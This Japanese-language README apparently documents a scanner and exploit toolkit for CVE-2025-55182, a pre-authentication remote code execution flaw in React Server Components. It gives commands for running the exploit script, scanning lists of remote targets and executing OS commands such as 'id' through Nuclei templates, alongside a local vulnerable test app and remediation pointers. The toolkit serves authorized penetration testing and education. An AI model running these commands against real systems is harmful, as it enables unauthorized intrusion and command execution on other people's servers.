
React Server Componentsの重大な事前認証RCEであるCVE-2025-55182用のスキャナーおよびエクスプロイトツールキット。検出、インタラクティブシェル、Dockerデプロイ、教育的な技術分析が含まれます。
CVE-2025-55182(React Server Componentsにおける重大な事前認証リモートコード実行の脆弱性)のための包括的なセキュリティテストツールキットです。
この脆弱性を100%理解したいですか?
📖 完全な技術分析を読む - 知っておくべきすべて:
- Reactがサーバー上で実行される理由(ブラウザだけでなく!)
- 視覚的な図による攻撃の仕組み
- エクスプロイトのすべての行を解説
- 初心者向けの概念から高度な悪用手法まで
- 前提知識は不要!
最適な用途: セキュリティレポート、トレーニング資料、脅威分析、または単なる学習!
この脆弱性はReact Server Componentsのバージョン19.0.0から19.2.0に影響し、以下に影響を与えます:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpack影響: 認証されていない攻撃者は、Server FunctionエンドポイントへのHTTPリクエストペイロードの安全でない逆シリアル化を通じて、リモートで任意のコードを実行できます。
👉 完全な技術分析を読む - 以下を網羅する包括的なガイド:
最適な用途:
前提知識は不要 - 基礎から始まり、高度な悪用手法まで段階的に解説します!
教育および許可されたセキュリティテスト専用
このツールは以下の目的のみを対象としています:
警告: コンピュータシステムへの不正アクセスは違法です。ユーザーは適用されるすべての法律および規制を遵守する責任があります。著者は本ツールの誤用について一切の責任を負いません。
依存関係は不要! クイックテストのための単一のbashスクリプトです。
👉 EXPLOIT_SCRIPT.md - 以下の機能を備えたスタンドアロンスクリプト:
# Single target
./exploit-cve-2025-55182.sh http://target.com
# Multiple targets
./exploit-cve-2025-55182.sh -f targets.txt
Docker、Web UI、Nuclei統合を備えた完全なツールキットです。インストール方法については以下をお読みください。
| 機能 | 説明 |
|---|---|
| 🐳 Dockerサポート | Docker Composeによるワンコマンドデプロイ |
| 🌐 Webインターフェース | 非技術者向けの使いやすいWeb UI |
| 🔍 脆弱性テスト環境 | 安全なテストのためのローカル脆弱性アプリを起動 |
| 🎯 リモートスキャン | 外部ターゲットの脆弱性をテスト |
| ⚡ インタラクティブシェル | OSコマンドを実行し、結果をリアルタイムで表示 |
| 📊 複数のスキャンモード | 検出のみ、または完全な悪用 |
| 📝 詳細なレポート | JSONおよびテキスト出力形式 |
| 🔧 Nuclei統合 | ProjectDiscoveryの強力なスキャナーを活用 |
インストール方法を選択してください:
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Start scanner
docker compose up
# Access web interface at http://localhost:3001
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Install Nuclei (macOS)
brew install nuclei
# Make scripts executable
chmod +x scripts/*.sh
📖 詳細なセットアップ: ステップバイステップの手順はSETUP_GUIDE.mdを参照
⚡ クイックリファレンス: 一般的なユースケースはQUICKSTART.mdを参照
Webインターフェースを起動:
docker compose up
# Open browser: http://localhost:3001
脆弱性テストアプリを起動:
docker compose --profile with-vulnerable-app up
# Scanner: http://localhost:3001
# Vulnerable app: http://localhost:3000
Dockerユーザーへの重要なお知らせ: Dockerからスキャンする場合は、以下を使用してください:
http://host.docker.internal:3000(ホストマシン上のアプリをスキャンする場合)http://vulnerable-app:3000(コンテナ化された脆弱性アプリをスキャンする場合)https://example.com(外部ターゲットの場合)http://localhost:3001に移動しますローカルの脆弱性アプリを作成してテストします:
# Terminal 1: Start vulnerable app
./scripts/setup-vulnerable-app.sh
# App will run on http://localhost:3000
# Terminal 2: Test it
./scripts/test-local.sh
# Execute custom commands
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Basic scan
./scripts/test-remote.sh https://target.com
# With command execution
./scripts/test-remote.sh https://target.com "id"
# Create targets file
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Scan all targets
./scripts/test-multiple.sh targets.txt
基本的な脆弱性検出:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
カスタムコマンドの実行:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
複数のターゲットをスキャン:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v
CVE-2025-55182-Scanner/
├── README.md # Main documentation
├── EXPLOIT_SCRIPT.md # Standalone script guide
├── QUICKSTART.md # Quick start guide
├── SETUP_GUIDE.md # Detailed setup instructions
├── LICENSE # MIT License
│
├── exploit-cve-2025-55182.sh # Standalone exploit script
│
├── Dockerfile # Docker configuration
├── docker-compose.yml # Docker Compose setup
│
├── templates/ # Nuclei templates
│ ├── cve-2025-55182.yaml # Detection template
│ └── cve-2025-55182-interactive.yaml # Interactive RCE template
│
├── scripts/ # Helper scripts
│ ├── setup-vulnerable-app.sh # Setup local vulnerable app
│ ├── test-local.sh # Test local instance
│ ├── test-remote.sh # Test remote target
│ └── test-multiple.sh # Test multiple targets
│
├── web-ui/ # Web interface
│ ├── server.js # Express server
│ ├── package.json # Dependencies
│ └── public/
│ └── index.html # Frontend
│
├── vulnerable-app/ # Vulnerable test app (generated)
│ ├── Dockerfile # Docker config
│ └── ...
│
└── docs/ # 📚 Documentation
├── TECHNICAL.md # ⭐ COMPLETE vulnerability guide
│ # - How it works (basics to advanced)
│ # - Attack flow with diagrams
│ # - Payload analysis (every line explained)
│ # - Detection & prevention
│ # - Real-world examples
└── REMEDIATION.md # Fix instructions
docs/TECHNICAL.md ⭐ 最も包括的なリソース
この脆弱性はReact Server Componentsにおける安全でない逆シリアル化に起因します。攻撃者は以下を行うことができます:
child_processモジュールへのアクセスを取得するこれが正確にどのように動作するのか理解したいですか?
この包括的なガイドには以下が含まれます:
✅ Why React Server Components run on the server (not browser)
✅ How prototype pollution works in JavaScript
✅ Step-by-step attack flow with visual diagrams
✅ Every byte of the exploit payload explained
✅ How attackers gain code execution from JSON
✅ Real-world proof of concept examples
✅ Detection methods and prevention strategies
平易な言葉で記述 - 博士号は不要! 「Reactの基礎」から「完全な悪用」までを1つのドキュメントで解説します。
最適な用途:
脆弱なバージョンを実行している場合:
完全ガイド: docs/REMEDIATION.md - 完全な修復手順
🎓 完全な技術分析 - 私たちの包括的なガイド
なぜ私たちの技術ガイドを読むべきか?
利用者: 世界中のセキュリティ研究者、開発者、ペネトレーションテスター、教育関係者。
コントリビューションを歓迎します! 貢献するには:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。
StealthMoud
このツールが役立つ場合は、サポートの表明としてこのリポジトリに⭐ Starを付けてください!
更新情報や新機能については、このリポジトリをWatchしてください。
このツールは、セキュリティ専門家が脆弱なシステムを特定して修復するのを支援するために公開されています。常に以下を心がけてください:
✅ テスト前に明示的な書面による許可を取得する
✅ 調査結果を関係者に責任を持って報告する
✅ 適用されるすべての法律と規制を遵守する
❌ 不正アクセスにこのツールを使用しない
❌ 悪意のある目的にこのツールを使用しない
注意: 不正なコンピュータアクセスは犯罪です。責任を持ってテストしてください。